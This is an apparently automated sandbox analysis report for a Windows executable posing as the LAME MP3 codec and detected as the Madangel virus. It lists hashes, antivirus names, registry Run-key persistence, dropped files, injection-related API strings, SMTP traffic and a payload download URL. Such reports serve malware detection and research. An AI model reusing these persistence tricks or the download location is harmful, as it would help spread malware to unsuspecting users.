Analysis Date: 2014-11-01 02:00:55
MD5: 5775040a86a4cad922a2a02a442b9412
SHA1: 7ae8e8330cc5865e88122edfb627006f530f9de7

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 2bb3642b0199694864fb9b2835fa7085 sha1: ccfc9da08f31439601291b732ce04e994d55a193 size: 2048
Section .rdata: md5: f70414bb795b058b318c69ecbba0942c sha1: 88d68cf8285b34e374dc911788e110b6a50e192f size: 512
Section .data: md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .rsrc: md5: f09a9b20bb02ae370785d87955c3ef10 sha1: 19f7e073e5409459478ffce41c0b750cd0d3cf12 size: 44746
Timestamp: 2006-08-04 06:52:40
Version:
LegalCopyright: Copyright © 2002 Steve Lhomme, Copyright © 2002-2007 The LAME Project
InternalName: lameACM
FileVersion: 0.9.2
CompanyName: http://www.mp3dev.org/
PrivateBuild:
LegalTrademarks: LGPL (see gnu.org)
Comments: This is an ACM driver for Win32 using Lame to encode
ProductName: Lame MP3 codec
SpecialBuild:
ProductVersion: 0.9.2
FileDescription: Lame MP3 codec engine
OriginalFilename: lameACM.acm
PEhash: e965872aa6d32fb453b4617cd4fa9ab4907b4329
IMPhash: c980cb7ca293a9371e8482e358604b02
AV 360 Safe: Virus.Win32.Madang.C
AV Ad-Aware: Win32.Madangel.I
AV Alwil (avast): Madangel:Win32:Madangel
AV Arcabit (arcavir): W32.ChineHacker.B
AV Authentium: W32/Downloader.BL.gen!Eldorado
AV Avira (antivir): W32/Small.l
AV BullGuard: Win32.Madangel.I
AV CA (E-Trust Ino): Win32/Madangel
AV CAT (quickheal): W32.Madang.A
AV ClamAV: W32.Madangel
AV Dr. Web: BackDoor.Bulknet.1150
AV Emsisoft: Win32.Madangel.I
AV Eset (nod32): Win32/Madang.B virus
AV Fortinet: W32/Madang.C!tr
AV Frisk (f-prot): W32/Downloader.BL.gen!Eldorado
AV F-Secure: Win32.Madangel.I
AV Grisoft (avg): Win32/Madang.C
AV Ikarus: Virus.Win32.Small
AV K7: Virus ( 00001b721 )
AV Kaspersky: Virus.Win32.Small.l
AV MalwareBytes: Trojan.Agent.BFG
AV Mcafee: W32/Alisa.d
AV Microsoft Security Essentials: Virus:Win32/Madang.A
AV MicroWorld (escan): Win32.Madangel.I
AV Norman: Win32.Madangel.I
AV Rising: Win32.AngryAngel.f
AV Sophos: W32/Madang-Fam
AV Symantec: W32.Madangel
AV Trend Micro: PE_MADANGEL.D
AV VirusBlokAda (vba32): Virus.Win32.Small.L

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer ➝
NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Serverx ➝
C:\WINDOWS\system32\Serverx.exe\\x00^\\xb9\\x10w\\x10\\xec\\xddw\\x93\\xdd@\\x00\\x90\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x1c\\xfe\\x12\\x00\\xa7Tne\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa7Tne\\xde\\x07\\x0b\\x00\\x06\\x00\\x01\\x00\\x07\\x001\\x003\\x00\\x0f\\x00\\x9c\\xfd\\x12\\x00\\x07\\x001\\x00x\\xfe\\x12\\x00\\x04\\x00\\x00\\x00\\x90\\x00\\x00\\x00\\x93\\xdd@\\x00\\x04\\x00\\x00\\x00\\xe3-le,Une\\xa7Tne\\x8aVne\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90Tne\\x90\\x00\\x00\\x00\\xf5Tne\\x93\\xdd@\\x00\\x0fUne\\x04\\x00\\x00\\x00%Une\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xa6\\xdd@\\x000\\xae\\x80|\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\xfe\\x12\\x00x\\xff\\x12\\x00\\x88Ome\\x90\\x00\\x00\\x00\\x84\\xfe\\x12\\x00x\\xff\\x12\\x00\\x01\\x00\\x00\\x00\\x1c]me\\x90\\x00\\x00\\x00\\x93\\xdd@\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xa6\\xdd@\\x00\\x00\\x00\\x00\\x00
Creates File: C:\WINDOWS\system32\Serverx.exe
Creates Process: C:\malware.exe
Creates Mutex: Angry Angel v3.0

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\qyprusotemus ➝
C:\Documents and Settings\Administrator\qyprusotemus.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\AppManagement ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Crypto\RSA\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\a18ca4003deb042bbee7a40f15e1970b_666939c9-243b-475e-9504-51724db22670
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\qyprusotemus.exe
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Angry Angel v3.0
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: qyprusotemus
Winsock DNS: doctsf.com
Winsock DNS: automa.it
Winsock DNS: acsmedioambiente.com
Winsock DNS: tss.org
Winsock DNS: fraser-high.school.nz
Winsock DNS: www.traderush.com

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates Process: C:\setupx.dll
Winsock DNS: 192.168.6.161
Winsock URL: http://192.168.6.161/setupx.dat

Process
↳ C:\setupx.dll

Network Details:

DNS: smtp.glbdns2.microsoft.com
Type: A
65.55.176.126
DNS: smtp.mail.us.am0.yahoodns.net
Type: A
98.139.211.125
DNS: smtp.mail.us.am0.yahoodns.net
Type: A
63.250.193.228
DNS: smtp.mail.us.am0.yahoodns.net
Type: A
98.138.105.21
DNS: smtp.live.com
Type: A
DNS: smtp.mail.yahoo.com
Type: A
HTTP GET: http://192.168.6.161/setupx.dat
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 65.55.176.126:25
Flows TCP: 192.168.1.1:1032 ➝ 98.139.211.125:25
Flows TCP: 192.168.1.1:1034 ➝ 192.168.1.1:80

Raw Pcap
0x00000000 (00000)   47455420 2f736574 7570782e 64617420   GET /setupx.dat 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a203139 322e3136 382e362e   Host: 192.168.6.
0x000000b0 (00176)   3136310d 0a436f6e 6e656374 696f6e3a   161..Connection:
0x000000c0 (00192)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....


Strings
/
q^

040904b0
0.9.2
 2002-2007 The LAME Project
 2002 Steve Lhomme, Copyright 
6dB &hard limiter
Albu&m
&Album mode
&Artist
Average BitRate
Bits
Cancel
Checksum
Close
&Comment
Comments
CompanyName
Copyright
Copyright 
&Date
Decoding
default
&Dither 24bps to 16bps
E&nable dithering
&Enable ReplayGain
Encoding
FileDescription
FileVersion
FLAC Configuration
 FLAC Info  
&Genre
Gt'+
help
http://www.mp3dev.org/
icon : Lucas Granito
InternalName
lameACM
lameACM.acm
Lame MP3 codec
Lame MP3 codec : About
Lame MP3 codec engine
LegalCopyright
LegalTrademarks
LGPL license
LGPL (see gnu.org)
 Miscellaneous  
msctls_trackbar32
MS Sans Serif
Noise &shaping
Note: changes take effect after restarting playback
Original
OriginalFilename
&Output bit depth
&Preamp
Private
PrivateBuild
ProductName
ProductVersion
Read ID3v&1 tags
&Remove
 ReplayGain  
Reserve space for &FLAC tags
Reset
 Resolution  
Separate tag values &with
&Show instantaneous bitrate while playing
Slider1
Slider2
Slider3
Slider4
Smart Encode
SpecialBuild
Static
Step
Stereo mode
Steve Lhomme + LAME developers
Stop on &all errors
StringFileInfo
SysTabControl32
Tab1
 Tag  
 Tag Editor  
test
TEXTINCLUDE
This is an ACM driver for Win32 using Lame to encode
&Title
 Title Formatting  
Track &number
Translation
&Update
v0.0.0 - 0.00
VarFileInfo
VS_VERSION_INFO
 Without ReplayGain 
 With ReplayGain 
	_36r/
4zYw@}p:
5EShy*
?_#5v`N
8Ga jO
,"^}9N
ADVAPI32.DLL
Angry Angel v3.0
A}qT'b
AutoShareServer
AutoShareWks
axHG$#
b#WuW8z
-:C7Xc&
CloseHandle
closesocket
connect
C$>';r
CreateKernelThread
CreateMutexA
CreateRemoteThread
CreateThread
C:\setupx.dll
@.data
DeleteFileA
 DEv.Q
DllHasRun
-,e;:r7m
ewRqIA
=.exet
FindClose
FindFirstFileA
FindNextFileA
FindWindowA
gdi32.dll
GetCommandLineA
GetComputerNameA
GetCurrentProcessId
GetDriveTypeA
GetFullPathNameA
gethostbyname
GetLastError
GetModuleHandleA
GetObjectA
GetProcAddress
GetSystemDirectoryA
GetSystemTime
GetWindow
GetWindowThreadProcessId
http://vguarder.91i.net/SETUPX.EXE
&<+}i 
.idata
#include "afxres.h"
kernel32.dll
KERNEL32.dll
K#xY\h
_lclose
_lcreat
<ll%IE
_llseek
LoadImageA
LoadLibraryA
LoadLibraryExA
_lopen
_lread
lut~ar
_lwrite
lxsN>#g
"_M2/{D
MessageBoxA
\M=LIq
MPR.DLL
nf'`Ey(
OpenMutexA
OpenProcess
Ot2(r~
p'%	>R
QS9012NMN-789733-908
`.rdata
RegisterServiceProcess
RegNotifyChangeKeyValue
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
.reloc
resource.h
rwZ	.5
=.scrt
SendMessageA
Serverx
\Serverx.exe
SetCurrentDirectoryA
SetFileAttributesA
SetFileTime
\setupx.exe
SHELL32.DLL
ShellExecuteA
ShowCursor
socket
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
s&XF"mB$
SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
TerminateThread
!This program cannot be run in DOS mode.
This program must be run under Win32
\updatex.exe
URLDownloadToFileA
URLMON.DLL
user32.dll
USER32.DLL
V4Xf=`
.VCsm&
VirtualAllocEx
WaitForSingleObject
WideCharToMultiByte
=windtz
WinExec
    =winn
WNetCloseEnum
WNetEnumResourceA
WNetOpenEnumA
~}wO&E%^
<$w,R]
WriteProcessMemory
WSACleanup
WSAStartup
WSOCK32.DLL
wsprintfA
XBU@6Z
*$y,AT
YC8~:C
yuG.GM{